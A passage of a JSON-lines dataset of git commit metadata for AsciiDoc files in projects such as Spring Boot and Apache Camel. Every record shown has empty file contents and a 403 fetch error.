{"commit":"2cd68284fd5c3f4139914b556c1387da76ce38a5","subject":"Add reference to ff4j starter","message":"Add reference to ff4j 
starter\n","repos":"xiaoleiPENG\/my-project,mbogoevici\/spring-boot,habuma\/spring-boot,mosoft521\/spring-boot,kdvolder\/spring-boot,minmay\/spring-boot,spring-projects\/spring-boot,afroje-reshma\/spring-boot-sample,wilkinsona\/spring-boot,sebastiankirsch\/spring-boot,kamilszymanski\/spring-boot,hello2009chen\/spring-boot,rweisleder\/spring-boot,shakuzen\/spring-boot,jbovet\/spring-boot,akmaharshi\/jenkins,donhuvy\/spring-boot,linead\/spring-boot,herau\/spring-boot,lexandro\/spring-boot,vpavic\/spring-boot,sebastiankirsch\/spring-boot,bclozel\/spring-boot,chrylis\/spring-boot,deki\/spring-boot,lburgazzoli\/spring-boot,Buzzardo\/spring-boot,ilayaperumalg\/spring-boot,bijukunjummen\/spring-boot,qerub\/spring-boot,SaravananParthasarathy\/SPSDemo,zhanhb\/spring-boot,tsachev\/spring-boot,vpavic\/spring-boot,SaravananParthasarathy\/SPSDemo,ollie314\/spring-boot,eddumelendez\/spring-boot,drumonii\/spring-boot,ihoneymon\/spring-boot,sebastiankirsch\/spring-boot,tsachev\/spring-boot,mbenson\/spring-boot,isopov\/spring-boot,zhanhb\/spring-boot,kdvolder\/spring-boot,scottfrederick\/spring-boot,candrews\/spring-boot,nebhale\/spring-boot,lucassaldanha\/spring-boot,lexandro\/spring-boot,rweisleder\/spring-boot,eddumelendez\/spring-boot,donhuvy\/spring-boot,scottfrederick\/spring-boot,philwebb\/spring-boot-concourse,vakninr\/spring-boot,wilkinsona\/spring-boot,isopov\/spring-boot,olivergierke\/spring-boot,xiaoleiPENG\/my-project,bbrouwer\/spring-boot,mdeinum\/spring-boot,olivergierke\/spring-boot,bclozel\/spring-boot,dreis2211\/spring-boot,yhj630520\/spring-boot,NetoDevel\/spring-boot,NetoDevel\/spring-boot,pvorb\/spring-boot,zhanhb\/spring-boot,vpavic\/spring-boot,javyzheng\/spring-boot,akmaharshi\/jenkins,SaravananParthasarathy\/SPSDemo,shangyi0102\/spring-boot,RichardCSantana\/spring-boot,htynkn\/spring-boot,kamilszymanski\/spring-boot,shakuzen\/spring-boot,donhuvy\/spring-boot,jxblum\/spring-boot,vakninr\/spring-boot,pvorb\/spring-boot,rweisleder\/spring-boot,olivergierke\/spring-boot,SaravananParthasarathy\/SPSDemo,mbogoevici\/spring-boot,htynkn\/spring-boot,hqrt\/jenkins2-course-spring-boot,philwebb\/spring-boot,aahlenst\/spring-boot,minmay\/spring-boot,lburgazzoli\/spring-boot,afroje-reshma\/spring-boot-sample,bclozel\/spring-boot,zhanhb\/spring-boot,mbogoevici\/spring-boot,DeezCashews\/spring-boot,thomasdarimont\/spring-boot,bjornlindstrom\/spring-boot,lucassaldanha\/spring-boot,cleverjava\/jenkins2-course-spring-boot,cleverjava\/jenkins2-course-spring-boot,spring-projects\/spring-boot,yhj630520\/spring-boot,joshthornhill\/spring-boot,bijukunjummen\/spring-boot,jxblum\/spring-boot,lucassaldanha\/spring-boot,ilayaperumalg\/spring-boot,jvz\/spring-boot,felipeg48\/spring-boot,chrylis\/spring-boot,shangyi0102\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,felipeg48\/spring-boot,ollie314\/spring-boot,vpavic\/spring-boot,michael-simons\/spring-boot,tsachev\/spring-boot,philwebb\/spring-boot,mdeinum\/spring-boot,vpavic\/spring-boot,ihoneymon\/spring-boot,royclarkson\/spring-boot,isopov\/spring-boot,NetoDevel\/spring-boot,thomasdarimont\/spring-boot,vakninr\/spring-boot,pvorb\/spring-boot,lburgazzoli\/spring-boot,royclarkson\/spring-boot,mdeinum\/spring-boot,drumonii\/spring-boot,xiaoleiPENG\/my-project,jbovet\/spring-boot,michael-simons\/spring-boot,linead\/spring-boot,kdvolder\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,bjornlindstrom\/spring-boot,tsachev\/spring-boot,Nowheresly\/spring-boot,dreis2211\/spring-boot,jxblum\/spring-boot,hqrt\/jenkins2-course-spring-boot,htynkn\/spring-boot,pta
hchiev\/spring-boot,eddumelendez\/spring-boot,shakuzen\/spring-boot,shangyi0102\/spring-boot,sbcoba\/spring-boot,nebhale\/spring-boot,jayarampradhan\/spring-boot,lucassaldanha\/spring-boot,i007422\/jenkins2-course-spring-boot,mbenson\/spring-boot,chrylis\/spring-boot,yhj630520\/spring-boot,spring-projects\/spring-boot,kamilszymanski\/spring-boot,hello2009chen\/spring-boot,RichardCSantana\/spring-boot,ilayaperumalg\/spring-boot,royclarkson\/spring-boot,i007422\/jenkins2-course-spring-boot,eddumelendez\/spring-boot,vpavic\/spring-boot,candrews\/spring-boot,kdvolder\/spring-boot,hello2009chen\/spring-boot,rweisleder\/spring-boot,Buzzardo\/spring-boot,ollie314\/spring-boot,mbogoevici\/spring-boot,donhuvy\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,chrylis\/spring-boot,mdeinum\/spring-boot,bbrouwer\/spring-boot,qerub\/spring-boot,pvorb\/spring-boot,ptahchiev\/spring-boot,ptahchiev\/spring-boot,kamilszymanski\/spring-boot,DeezCashews\/spring-boot,afroje-reshma\/spring-boot-sample,aahlenst\/spring-boot,tiarebalbi\/spring-boot,sbcoba\/spring-boot,vakninr\/spring-boot,jbovet\/spring-boot,ilayaperumalg\/spring-boot,bjornlindstrom\/spring-boot,joshiste\/spring-boot,bbrouwer\/spring-boot,spring-projects\/spring-boot,joshthornhill\/spring-boot,olivergierke\/spring-boot,tsachev\/spring-boot,qerub\/spring-boot,thomasdarimont\/spring-boot,philwebb\/spring-boot,akmaharshi\/jenkins,dreis2211\/spring-boot,philwebb\/spring-boot-concourse,tiarebalbi\/spring-boot,donhuvy\/spring-boot,brettwooldridge\/spring-boot,herau\/spring-boot,dreis2211\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,ilayaperumalg\/spring-boot,candrews\/spring-boot,joshthornhill\/spring-boot,spring-projects\/spring-boot,philwebb\/spring-boot-concourse,mbenson\/spring-boot,cleverjava\/jenkins2-course-spring-boot,wilkinsona\/spring-boot,dreis2211\/spring-boot,ihoneymon\/spring-boot,scottfrederick\/spring-boot,habuma\/spring-boot,RichardCSantana\/spring-boot,felipeg48\/spring-boot,akmaharshi\/jenkins,habuma\/spring-boot,bijukunjummen\/spring-boot,joshiste\/spring-boot,mosoft521\/spring-boot,yangdd1205\/spring-boot,dreis2211\/spring-boot,sbcoba\/spring-boot,yangdd1205\/spring-boot,habuma\/spring-boot,philwebb\/spring-boot,brettwooldridge\/spring-boot,brettwooldridge\/spring-boot,bclozel\/spring-boot,javyzheng\/spring-boot,scottfrederick\/spring-boot,bjornlindstrom\/spring-boot,htynkn\/spring-boot,kamilszymanski\/spring-boot,philwebb\/spring-boot,ptahchiev\/spring-boot,joshiste\/spring-boot,ihoneymon\/spring-boot,mosoft521\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,cleverjava\/jenkins2-course-spring-boot,aahlenst\/spring-boot,i007422\/jenkins2-course-spring-boot,wilkinsona\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,michael-simons\/spring-boot,cleverjava\/jenkins2-course-spring-boot,jayarampradhan\/spring-boot,tiarebalbi\/spring-boot,brettwooldridge\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,spring-projects\/spring-boot,aahlenst\/spring-boot,philwebb\/spring-boot-concourse,xiaoleiPENG\/my-project,felipeg48\/spring-boot,qerub\/spring-boot,hqrt\/jenkins2-course-spring-boot,Buzzardo\/spring-boot,ilayaperumalg\/spring-boot,mbenson\/spring-boot,philwebb\/spring-boot-concourse,jvz\/spring-boot,michael-simons\/spring-boot,htynkn\/spring-boot,hqrt\/jenkins2-course-spring-boot,jxblum\/spring-boot,sebastiankirsch\/spring-boot,sbcoba\/spring-boot,bbrouwer\/spring-boot,tiarebalbi\/spring-boot,deki\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,deki\/spring-boot,i007422\/jenkins2-course-spring-boot,hab
uma\/spring-boot,zhanhb\/spring-boot,Nowheresly\/spring-boot,shakuzen\/spring-boot,DeezCashews\/spring-boot,drumonii\/spring-boot,NetoDevel\/spring-boot,joshthornhill\/spring-boot,afroje-reshma\/spring-boot-sample,wilkinsona\/spring-boot,kdvolder\/spring-boot,joshthornhill\/spring-boot,SaravananParthasarathy\/SPSDemo,mdeinum\/spring-boot,yhj630520\/spring-boot,eddumelendez\/spring-boot,habuma\/spring-boot,jayarampradhan\/spring-boot,bbrouwer\/spring-boot,eddumelendez\/spring-boot,javyzheng\/spring-boot,NetoDevel\/spring-boot,donhuvy\/spring-boot,tiarebalbi\/spring-boot,ihoneymon\/spring-boot,bclozel\/spring-boot,ihoneymon\/spring-boot,joshiste\/spring-boot,vakninr\/spring-boot,lucassaldanha\/spring-boot,tsachev\/spring-boot,javyzheng\/spring-boot,jvz\/spring-boot,candrews\/spring-boot,drumonii\/spring-boot,nebhale\/spring-boot,htynkn\/spring-boot,isopov\/spring-boot,afroje-reshma\/spring-boot-sample,wilkinsona\/spring-boot,pvorb\/spring-boot,javyzheng\/spring-boot,candrews\/spring-boot,hqrt\/jenkins2-course-spring-boot,Nowheresly\/spring-boot,sebastiankirsch\/spring-boot,royclarkson\/spring-boot,scottfrederick\/spring-boot,jayarampradhan\/spring-boot,isopov\/spring-boot,Buzzardo\/spring-boot,akmaharshi\/jenkins,linead\/spring-boot,jxblum\/spring-boot,tiarebalbi\/spring-boot,ptahchiev\/spring-boot,jbovet\/spring-boot,brettwooldridge\/spring-boot,Nowheresly\/spring-boot,scottfrederick\/spring-boot,linead\/spring-boot,linead\/spring-boot,lexandro\/spring-boot,michael-simons\/spring-boot,drumonii\/spring-boot,shangyi0102\/spring-boot,ollie314\/spring-boot,shakuzen\/spring-boot,shangyi0102\/spring-boot,chrylis\/spring-boot,hello2009chen\/spring-boot,minmay\/spring-boot,kdvolder\/spring-boot,bijukunjummen\/spring-boot,isopov\/spring-boot,lexandro\/spring-boot,jvz\/spring-boot,felipeg48\/spring-boot,deki\/spring-boot,philwebb\/spring-boot,mdeinum\/spring-boot,rweisleder\/spring-boot,nebhale\/spring-boot,Buzzardo\/spring-boot,lburgazzoli\/spring-boot,lexandro\/spring-boot,chrylis\/spring-boot,DeezCashews\/spring-boot,jbovet\/spring-boot,minmay\/spring-boot,joshiste\/spring-boot,shakuzen\/spring-boot,ollie314\/spring-boot,mbenson\/spring-boot,thomasdarimont\/spring-boot,jxblum\/spring-boot,yangdd1205\/spring-boot,Buzzardo\/spring-boot,qerub\/spring-boot,DeezCashews\/spring-boot,lburgazzoli\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,Nowheresly\/spring-boot,mosoft521\/spring-boot,i007422\/jenkins2-course-spring-boot,xiaoleiPENG\/my-project,mbenson\/spring-boot,herau\/spring-boot,michael-simons\/spring-boot,herau\/spring-boot,sbcoba\/spring-boot,royclarkson\/spring-boot,drumonii\/spring-boot,herau\/spring-boot,jvz\/spring-boot,aahlenst\/spring-boot,bclozel\/spring-boot,nebhale\/spring-boot,yhj630520\/spring-boot,deki\/spring-boot,minmay\/spring-boot,hello2009chen\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,mosoft521\/spring-boot,felipeg48\/spring-boot,olivergierke\/spring-boot,bijukunjummen\/spring-boot,mbogoevici\/spring-boot,RichardCSantana\/spring-boot,rweisleder\/spring-boot,bjornlindstrom\/spring-boot,ptahchiev\/spring-boot,zhanhb\/spring-boot,aahlenst\/spring-boot,joshiste\/spring-boot,jayarampradhan\/spring-boot,thomasdarimont\/spring-boot,RichardCSantana\/spring-boot","old_file":"spring-boot-starters\/README.adoc","new_file":"spring-boot-starters\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mbogoevici\/spring-boot.git\/': The requested URL returned error: 
403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8c9eff6c8be1b20a14c1ec64f4cd9bb0a4f1efae","subject":"Update 2017-07-11-The-very-scary-phenomenum-of-things-starting-to-get-concrete.adoc","message":"Update 2017-07-11-The-very-scary-phenomenum-of-things-starting-to-get-concrete.adoc","repos":"mairandomness\/randomblog,mairandomness\/randomblog,mairandomness\/randomblog,mairandomness\/randomblog","old_file":"_posts\/2017-07-11-The-very-scary-phenomenum-of-things-starting-to-get-concrete.adoc","new_file":"_posts\/2017-07-11-The-very-scary-phenomenum-of-things-starting-to-get-concrete.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mairandomness\/randomblog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1b99c97c7d0865fdd04854415c6b020419bfdb9d","subject":"Update 2016-11-26-Todo.adoc","message":"Update 2016-11-26-Todo.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2016-11-26-Todo.adoc","new_file":"_posts\/2016-11-26-Todo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e014d2b1fa98dd411aa6ae884dc5517a492b98c2","subject":"Modifica di qualche ritorno a capo","message":"Modifica di qualche ritorno a capo\n","repos":"gionatamassibenincasa\/scrittura_con_asciidoc,gionatamassibenincasa\/scrittura_con_asciidoc,gionatamassibenincasa\/scrittura_con_asciidoc","old_file":"scrittura_ts_asciidoc.adoc","new_file":"scrittura_ts_asciidoc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gionatamassibenincasa\/scrittura_con_asciidoc.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"4dd9480ab7720b996b3a50ab332ad80cd77ecadb","subject":"Removing trailing whitespaces","message":"Removing trailing whitespaces","repos":"joachimmetz\/artifacts,Onager\/artifacts,Onager\/artifacts,pstirparo\/artifacts,joachimmetz\/artifacts,ForensicArtifacts\/artifacts,ForensicArtifacts\/artifacts,pstirparo\/artifacts","old_file":"docs\/Artifacts definition format and style guide.asciidoc","new_file":"docs\/Artifacts definition format and style guide.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/joachimmetz\/artifacts.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"671704bf037be6fb1a81ed03e0a16283b925ef36","subject":"Add release notes document for release 2.23.0","message":"Add release notes document for release 2.23.0\n\nSigned-off-by: Gregor Zurowski 
<5fdc67d2166bcdd1d3aa4ed45ea5a25e9b21bc20@zurowski.org>\n","repos":"apache\/camel,gnodet\/camel,ullgren\/camel,punkhorn\/camel-upstream,mcollovati\/camel,mcollovati\/camel,nicolaferraro\/camel,mcollovati\/camel,alvinkwekel\/camel,pmoerenhout\/camel,zregvart\/camel,punkhorn\/camel-upstream,christophd\/camel,apache\/camel,tdiesler\/camel,tadayosi\/camel,DariusX\/camel,adessaigne\/camel,DariusX\/camel,apache\/camel,CodeSmell\/camel,christophd\/camel,davidkarlsen\/camel,apache\/camel,davidkarlsen\/camel,Fabryprog\/camel,objectiser\/camel,apache\/camel,adessaigne\/camel,tdiesler\/camel,tdiesler\/camel,cunningt\/camel,tadayosi\/camel,nikhilvibhav\/camel,christophd\/camel,nikhilvibhav\/camel,gnodet\/camel,cunningt\/camel,nikhilvibhav\/camel,Fabryprog\/camel,tdiesler\/camel,CodeSmell\/camel,nicolaferraro\/camel,adessaigne\/camel,tadayosi\/camel,CodeSmell\/camel,tadayosi\/camel,objectiser\/camel,nicolaferraro\/camel,objectiser\/camel,CodeSmell\/camel,pax95\/camel,davidkarlsen\/camel,pax95\/camel,alvinkwekel\/camel,christophd\/camel,cunningt\/camel,pmoerenhout\/camel,tdiesler\/camel,punkhorn\/camel-upstream,pax95\/camel,alvinkwekel\/camel,punkhorn\/camel-upstream,adessaigne\/camel,gnodet\/camel,adessaigne\/camel,Fabryprog\/camel,Fabryprog\/camel,cunningt\/camel,pax95\/camel,cunningt\/camel,ullgren\/camel,pmoerenhout\/camel,pmoerenhout\/camel,tadayosi\/camel,christophd\/camel,gnodet\/camel,zregvart\/camel,pmoerenhout\/camel,nicolaferraro\/camel,zregvart\/camel,pmoerenhout\/camel,DariusX\/camel,zregvart\/camel,cunningt\/camel,tdiesler\/camel,alvinkwekel\/camel,adessaigne\/camel,gnodet\/camel,ullgren\/camel,objectiser\/camel,davidkarlsen\/camel,christophd\/camel,pax95\/camel,pax95\/camel,DariusX\/camel,ullgren\/camel,tadayosi\/camel,nikhilvibhav\/camel,apache\/camel,mcollovati\/camel","old_file":"docs\/user-manual\/en\/release-notes\/camel-2230-release.adoc","new_file":"docs\/user-manual\/en\/release-notes\/camel-2230-release.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d2d3a801ca7fba911ec3b2b2611a9533d8224875","subject":"Update 2018-10-16-an-existential-wonder.adoc","message":"Update 2018-10-16-an-existential-wonder.adoc","repos":"gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io","old_file":"_posts\/2018-10-16-an-existential-wonder.adoc","new_file":"_posts\/2018-10-16-an-existential-wonder.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gudhakesa\/gudhakesa.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1254f7725b3dfe5c7bc05dad7e84e559c775e313","subject":"Update 2015-08-03-Welcome-to-Mirum-Singapore-Agency-Showcase.adoc","message":"Update 2015-08-03-Welcome-to-Mirum-Singapore-Agency-Showcase.adoc","repos":"MirumSG\/agencyshowcase,MirumSG\/agencyshowcase,MirumSG\/agencyshowcase","old_file":"_posts\/2015-08-03-Welcome-to-Mirum-Singapore-Agency-Showcase.adoc","new_file":"_posts\/2015-08-03-Welcome-to-Mirum-Singapore-Agency-Showcase.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/MirumSG\/agencyshowcase.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"55f19ac49ffe918b0d7982ef1563ab467e831a81","subject":"Update 
2016-04-10-My-first-post-on-githubio-with-hubpressio.adoc","message":"Update 2016-04-10-My-first-post-on-githubio-with-hubpressio.adoc","repos":"kfkelvinng\/kfkelvinng.github.io,kfkelvinng\/kfkelvinng.github.io,kfkelvinng\/kfkelvinng.github.io,kfkelvinng\/kfkelvinng.github.io","old_file":"_posts\/2016-04-10-My-first-post-on-githubio-with-hubpressio.adoc","new_file":"_posts\/2016-04-10-My-first-post-on-githubio-with-hubpressio.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kfkelvinng\/kfkelvinng.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ade194f1feedd9fbcd3d46f0ed736f2ed66c0037","subject":"Update 2016-10-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-El-Reto.adoc","message":"Update 2016-10-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-El-Reto.adoc","repos":"neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io","old_file":"_posts\/2016-10-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-El-Reto.adoc","new_file":"_posts\/2016-10-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-El-Reto.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/neocarvajal\/neocarvajal.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e59c4cd9099a9e2a746f8df8256d149762804033","subject":"y2b create post Marshall Minor Headphones Unboxing (White)","message":"y2b create post Marshall Minor Headphones Unboxing (White)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-01-06-Marshall-Minor-Headphones-Unboxing-White.adoc","new_file":"_posts\/2012-01-06-Marshall-Minor-Headphones-Unboxing-White.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"be2e1181070d6b5586e0bcac06285383fdb9c45a","subject":"Update 2017-02-01-Visualisation-of-January-Transfer-Window.adoc","message":"Update 2017-02-01-Visualisation-of-January-Transfer-Window.adoc","repos":"danharr\/danharr.github.io,danharr\/danharr.github.io,danharr\/danharr.github.io,danharr\/danharr.github.io","old_file":"_posts\/2017-02-01-Visualisation-of-January-Transfer-Window.adoc","new_file":"_posts\/2017-02-01-Visualisation-of-January-Transfer-Window.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/danharr\/danharr.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6dc11f6129ab04ddb98b99fcff70bdc5c229cd17","subject":"UnitTests-082320","message":"UnitTests-082320\n\nAdd 
note","repos":"keithbrown\/bridgepoint,cortlandstarrett\/bridgepoint,leviathan747\/bridgepoint,rmulvey\/bridgepoint,cortlandstarrett\/bridgepoint,leviathan747\/bridgepoint,leviathan747\/bridgepoint,keithbrown\/bridgepoint,leviathan747\/bridgepoint,travislondon\/bridgepoint,cortlandstarrett\/bridgepoint,lwriemen\/bridgepoint,leviathan747\/bridgepoint,lwriemen\/bridgepoint,travislondon\/bridgepoint,xtuml\/bridgepoint,lwriemen\/bridgepoint,leviathan747\/bridgepoint,rmulvey\/bridgepoint,cortlandstarrett\/bridgepoint,rmulvey\/bridgepoint,cortlandstarrett\/bridgepoint,travislondon\/bridgepoint,leviathan747\/bridgepoint,rmulvey\/bridgepoint,lwriemen\/bridgepoint,travislondon\/bridgepoint,keithbrown\/bridgepoint,keithbrown\/bridgepoint,rmulvey\/bridgepoint,xtuml\/bridgepoint,keithbrown\/bridgepoint,rmulvey\/bridgepoint,travislondon\/bridgepoint,cortlandstarrett\/bridgepoint,xtuml\/bridgepoint,xtuml\/bridgepoint,xtuml\/bridgepoint,keithbrown\/bridgepoint,lwriemen\/bridgepoint,xtuml\/bridgepoint,xtuml\/bridgepoint,lwriemen\/bridgepoint,cortlandstarrett\/bridgepoint,travislondon\/bridgepoint,lwriemen\/bridgepoint,rmulvey\/bridgepoint,travislondon\/bridgepoint,cortlandstarrett\/bridgepoint,lwriemen\/bridgepoint,leviathan747\/bridgepoint,xtuml\/bridgepoint,travislondon\/bridgepoint,keithbrown\/bridgepoint","old_file":"doc-bridgepoint\/notes\/UnitTests-082320\/UnitTests-082320_int.adoc","new_file":"doc-bridgepoint\/notes\/UnitTests-082320\/UnitTests-082320_int.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xtuml\/bridgepoint.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4ee1f5a7778bcfb81f62a26822f1bf5e5a397aac","subject":"y2b create post OnePlus 5T Lava Red Unboxing - $500 Can't Go Further","message":"y2b create post OnePlus 5T Lava Red Unboxing - $500 Can't Go Further","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-01-19-OnePlus5TLavaRedUnboxing500CantGoFurther.adoc","new_file":"_posts\/2018-01-19-OnePlus5TLavaRedUnboxing500CantGoFurther.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aca2002814ce7a44c1c275b59241d65c0527775c","subject":"y2b create post Sekonic L-758DR DigitalMaster Unboxing \\u0026 Overview + Close Ups!","message":"y2b create post Sekonic L-758DR DigitalMaster Unboxing \\u0026 Overview + Close Ups!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-01-20-Sekonic-L758DR-DigitalMaster-Unboxing-u0026-Overview--Close-Ups.adoc","new_file":"_posts\/2011-01-20-Sekonic-L758DR-DigitalMaster-Unboxing-u0026-Overview--Close-Ups.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cca14dfcabbd01835f741557eb27ff28dba9dcdd","subject":"Delete the file at '_posts\/2017-05-31-A-test.adoc'","message":"Delete the file at 
'_posts\/2017-05-31-A-test.adoc'","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2017-05-31-A-test.adoc","new_file":"_posts\/2017-05-31-A-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"69813e7dd05d70f865b59c3914291262b5ba8e99","subject":"Update 2016-08-29-HITB-Singapore-A-few-cryptography-challenge-writeups.adoc","message":"Update 2016-08-29-HITB-Singapore-A-few-cryptography-challenge-writeups.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2016-08-29-HITB-Singapore-A-few-cryptography-challenge-writeups.adoc","new_file":"_posts\/2016-08-29-HITB-Singapore-A-few-cryptography-challenge-writeups.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"32bfcea22dce15708ea9a0de8a4a14fd9a149a12","subject":"Update 2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","message":"Update 2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","repos":"patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io","old_file":"_posts\/2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","new_file":"_posts\/2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/patricekrakow\/patricekrakow.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b26825928f8abc7db8098a9571a2cf81c7a8ee6c","subject":"Adds new references","message":"Adds new references\n","repos":"cortizqgithub\/csoftz-rp,cortizqgithub\/csoftz-rp,cortizqgithub\/csoftz-rp,cortizqgithub\/csoftz-rp","old_file":"ccma-quality-control\/Docs\/setup\/V3.6.0.0\/setup\/src\/docs\/asciidoc\/blocks\/references.adoc","new_file":"ccma-quality-control\/Docs\/setup\/V3.6.0.0\/setup\/src\/docs\/asciidoc\/blocks\/references.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cortizqgithub\/csoftz-rp.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"628b0982abf2b1e9cdd8d2575579deefa6860e11","subject":"Update 2017-01-30-Advanced-content-filtering-with-Satellite-6.adoc","message":"Update 2017-01-30-Advanced-content-filtering-with-Satellite-6.adoc","repos":"wzzrd\/hubpress.io,wzzrd\/hubpress.io,wzzrd\/hubpress.io,wzzrd\/hubpress.io","old_file":"_posts\/2017-01-30-Advanced-content-filtering-with-Satellite-6.adoc","new_file":"_posts\/2017-01-30-Advanced-content-filtering-with-Satellite-6.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wzzrd\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"454a421dd004ae16453481b4039dc03ff20bfa8d","subject":"Developer Guide: Add troubleshooting section for Checkstyle-IDEA","message":"Developer Guide: Add troubleshooting section for Checkstyle-IDEA\n","repos":"damithc\/addressbook-level4,damithc\/addressbook-level4,CS2103R-Eugene-Peh\/addressbook-level4,CS2103R-Eugene-Peh\/addressbook-level4,se-edu\/addressbook-level3,CS2103R-Eugene-Peh\/addressbook-level4,damithc\/addressbook-level4","old_file":"docs\/DeveloperGuide.adoc","new_file":"docs\/DeveloperGuide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/se-edu\/addressbook-level3.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b2307397a4544f4836c76a8b0e59a424320e1e45","subject":"Updated doc\/INTRODUCTION.adoc","message":"Updated 